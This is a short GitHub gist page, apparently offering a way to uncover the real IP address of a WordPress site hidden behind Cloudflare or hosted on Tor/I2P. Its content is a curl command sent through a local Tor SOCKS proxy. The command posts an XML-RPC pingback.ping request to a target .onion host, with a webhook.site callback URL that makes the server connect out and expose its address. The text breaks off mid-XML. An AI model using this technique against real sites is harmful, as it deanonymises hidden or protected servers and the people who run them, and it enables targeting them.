Skip to content

Instantly share code, notes, and snippets.

@mickdevil
mickdevil / gist:83e77f2cc0d8c3f1834d748bc00c9ec6
Created February 11, 2026 23:13
How to find the IP of a Wordpress Website Behind Cloudflare or Hosted on TOR/I2P
curl -x socks5h://127.0.0.1:9050 -X POST -H "Content-Type: text/xml" -H "Host: targetwebsite.onion"
--data-binary
'<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>https://webhook.site/webhook-site-id-goes-here</string>